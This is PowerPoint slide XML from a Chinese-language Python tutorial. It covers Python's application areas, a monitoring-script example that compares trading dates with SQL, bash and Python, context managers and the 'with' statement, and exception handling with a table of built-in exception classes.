              <a:t>, Disney, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Dreamworks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6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>游戏后台 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(Eve Online, Second Life, Battlefield)</a:t>
            </a:r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7. Email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>基础设施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(Mailman, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Mailgun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8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>媒体存储和处理 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(YouTube, Instagram, Dropbox)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9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>操作和系统管理 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(Rackspace, OpenStack)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10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>自然语言处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(NLTK)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11. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>机器学习和计算机版本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scikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>-learn, Orange, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>SimpleCV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12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>安全性和渗透性测试 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>很多很多 以及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>eBay/PayPal)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13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>大数据 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(Disco, Hadoop support)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14. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>日历 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(Calendar Server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>它 驱动了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Apple iCal)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15. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>搜索系统 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(ITA, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1"/>
              <a:t>Ultraseek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>还有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>Google)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16. Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>基础设施 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0"/>
              <a:t>(DNS) (BIND 10)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5940152" y="4390710"/>
            <a:ext cx="23762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</a:rPr>
              <a:t>Guido van Rossum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>（吉多</a:t>
            </a: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1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
                <a:latin typeface="arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>范罗苏姆）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="组合 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5440464" y="740653"/>
            <a:ext cx="2875953" cy="3672408"/>
            <a:chOff x="5440464" y="717406"/>
            <a:chExt cx="2875953" cy="36724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CCABD"/>
                </a:clrFrom>
                <a:clrTo>
                  <a:srgbClr val="CCCAB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3" r="5099" b="2054"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940152" y="717406"/>
              <a:ext cx="2376265" cy="3672408"/>
            </a:xfrm>
            <a:prstGeom prst="snip2Diag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464" y="843558"/>
              <a:ext cx="567328" cy="794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00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42964" y="4835748"/>
            <a:ext cx="393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36825" y="159484"/>
            <a:ext cx="3021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Hostmonitor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监控案列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904143E-8472-4E41-885B-06362AF03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5" y="735037"/>
            <a:ext cx="8727663" cy="1392689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 dirty="0"/>
              <a:t>需求：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>监控逻辑如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>一共有两个市场</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>要分别监控</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>[00:00:00--15:00:00) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>A&gt;=B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>则报警</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>[15:00:00--00:00:00) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>A&gt; B </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>则报警</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t>A1=select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CUR_TRD_DATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t> from OTCTS.OTC_MARKET WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MKT_CODE ='0';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008200"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t>B1=select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>min(PHYS_DATE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t> from OTCTS.OTC_CALENDAR WHERE TRD_DAY_FLAG='1' AND PHYS_DATE&gt;TO_CHAR(SYSDATE,'YYYYMMDD') and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008200"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MKT_CODE='0'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1050" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t>A2=select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CUR_TRD_DATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t> from OTCTS.OTC_MARKET WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MKT_CODE ='2';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="10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sz="1050" dirty="0"/>
              <a:t>B2=select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>min(PHYS_DATE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0"/>
              <a:t> from OTCTS.OTC_CALENDAR WHERE TRD_DAY_FLAG='1' AND PHYS_DATE&gt;TO_CHAR(SYSDATE,'YYYYMMDD') and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>MKT_CODE='2';</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN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3965" y="2427734"/>
            <a:ext cx="5775335" cy="2123658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#!/bin/bash</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>Data=$(cat /home/oracle/tools/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>CheckDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>/CheckDate.txt | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>awk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> '{if($1&gt;$2 &amp;&amp; $3&gt;$4) {print $1"&gt;"$2 " | " $3"&gt;"$4} else if($1&gt;$2 ){print $1"&gt;"$2} else if($3&gt;$4){ print $3"&gt;"$4} else{print "OK"} }')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if [ "$Data" == "OK" ]</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>then</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>ScriptRes:OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>:$Data"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>else</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t> echo "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0" err="1"/>
              <a:t>ScriptRes:Bad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>:$Data"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>fi </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="云形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20797418">
            <a:off x="6324573" y="2845707"/>
            <a:ext cx="1875064" cy="1053177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来个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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版写法！</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="矩形 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4583459" y="741415"/>
            <a:ext cx="4381029" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect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[oracle@rhel6-Minion1 CheckDate]$ cat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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CheckDate.txt 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20170229     20170230   20170205     20170330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[oracle@rhel6-Minion1 CheckDate]$ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38148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8344" y="48252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36825" y="159484"/>
            <a:ext cx="3021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Hostmonitor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监控案列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98288" y="1240202"/>
            <a:ext cx="4381029" cy="3400931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/bin/python</a:t>
            </a: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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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open("~oracle/tools/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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CheckDate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11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/CheckDate.txt")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="11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A1,B1,A2,B2 =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c.strip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().split()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#print A1,B1,A2,B2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A1&lt;B1 and A2&lt;B2: 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 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ScriptRes:Ok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:" + "A1&lt;B1 and A2&lt;B2" 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A1&gt;B1 and A2&gt;B2: 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 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ScriptRes:Bad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:" + "A1&gt;B1 and A2&gt;B2" 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A1&gt;B1 and A2&lt;B2: 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 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ScriptRes:Bad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:" + "A1&gt;B1"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A1&lt;B1 and A2&gt;B2: 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 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ScriptRes:Bad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:" + "A2&gt;B2"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1" y="642655"/>
            <a:ext cx="4297125" cy="399847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598288" y="624212"/>
            <a:ext cx="4381029" cy="553998"/>
          </a:xfrm>
          <a:prstGeom prst="rect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[oracle@rhel6-Minion1 CheckDate]$ cat CheckDate.txt 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20170229     20170230   20170205     20170330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[oracle@rhel6-Minion1 CheckDate]$ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12920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2764" y="482304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with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用法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FD39326-C5D9-485E-8486-75ECB8C5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4" y="584911"/>
            <a:ext cx="8534500" cy="4552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基于上下文管理器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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主要用于共享资源，借助对象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__enter__()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__exit__()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方法完成资源分配和释放底层次工作，比如：数据库连接、锁分配、信号量加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减、状态管理、文件打开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关闭、异常处理等。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BC29D22-0E28-4826-8236-1F0CE300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4" y="1026930"/>
            <a:ext cx="3493940" cy="762983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open('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10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Chinglish.txt','r',encoding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zh-CN" sz="10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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="10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f.read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f.close</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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9F88BDF-C9B8-4438-AFAF-E1D9025C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57" y="1868177"/>
            <a:ext cx="3546947" cy="1378536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read_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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10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'Chinglish.txt'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.join(f.readlines())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except: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occurs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finally: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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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0FB4709-90F5-4C43-BD5B-4756377CE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3" y="3324977"/>
            <a:ext cx="3546947" cy="1378536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read_file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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'Chinglish.txt'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.join(f.readlines())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except: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occurs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finally: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  <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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BC29D22-0E28-4826-8236-1F0CE300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772" y="2979796"/>
            <a:ext cx="3600400" cy="1070760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  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zh-CN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altLang="zh-CN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open('Chinglish', 'w') </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN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f: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zh-CN" altLang="zh-CN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f.readlines() </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="12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Exception as err:  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print("File Error:" +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(err)) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="10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0924" y="4120822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with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urier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>也可以复合使用：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0509" y="4428599"/>
            <a:ext cx="48965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open(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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a.txt"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zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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 as file1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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b.txt"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="105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zh-CN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file2:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1050" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="5C5C5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1183" y="2281660"/>
            <a:ext cx="3168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相对好的写法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    兼顾资源释放和异常捕获</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="云形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2490451" y="2935218"/>
            <a:ext cx="1197292" cy="701254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</a:rPr>
              <a:t>有木有看出隐含的尴尬！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043417C-9C54-49FF-A7D2-FF0A86F8A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924" y="1036533"/>
            <a:ext cx="2962113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__enter__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__enter__()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__exit__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(self,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e_t,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e_v,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t_b):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__exit__()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A()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6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6964" y="1200151"/>
            <a:ext cx="1558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输出：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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__enter__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zh-CN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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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__exit__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zh-CN" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202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977292" y="1448411"/>
            <a:ext cx="144016" cy="11522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异常处理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CB60573-26E1-4D1F-B53F-8F4C4F8D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38" y="600076"/>
            <a:ext cx="3059832" cy="39946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try...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r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009999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20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2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result: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,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r)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if( r == 5 ):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lang="en-US" altLang="zh-CN" sz="1000" b="1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raise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ValueError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('value is 5.')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except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ValueError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as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ValueError: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,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except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ValueError</a:t>
            </a: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,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ZeroDivisionError</a:t>
            </a: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as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e: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1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Vaule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|</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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ZeroDivisionError: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,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except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000" dirty="0" err="1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xception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as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e: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'Exception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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Error: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,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 dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333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except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' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0" err="1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encount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error! '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN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lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="444444"/>
              </a:solidFill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no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error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DD11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. 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finally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finally...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 Unicode MS" panose="020B0604020202020204" pitchFamily="34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print(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END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anose="020B0604020202020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a: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F0F18227-372F-4E52-A686-181C7802A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647" y="590157"/>
            <a:ext cx="4549786" cy="861774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int()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函数可能会抛出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ValueError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，所以我们用一个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except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捕获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ValueError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，用另一个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except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捕获</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ValueError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZeroDivisionError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。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此外如果没有错误发生，可以在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except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语句块后面加一个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else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，当没有错误发生时，会自动执行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  <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>else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语句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finally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effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>最后一定会被执行。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>也可以自定义异常类继承与某现成的类。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1000" dirty="0">
              <a:latin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9F413FB-76EB-4C74-9272-BBBD25441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98643"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3910647" y="1451931"/>
          <a:ext cx="4549786" cy="3136043"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2029505">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2831092044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3931752073"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="266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800000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>类   名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800000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>描    述</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0">
                        <a:effectLst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52498"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="263709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Exception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所有异常的基类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367626"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="242923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AttributeError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特征引用或者赋值失败时引发的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162390"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="261133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IOError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试图打在不存在的文件（包括其他情况）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17917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IndexError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使用序列中不存在的索引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22687"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="247680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KeyError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使用映射中不存在的键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246037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NameError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找不到名字（变量）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1452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SyntaxError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在代码为错误形式时引发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566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在内建操作或者函数应用与错误类型的对象时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17154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ValueError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正确的类型对象，但是对象使用不合适的值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01373"/>
                  </a:ext>
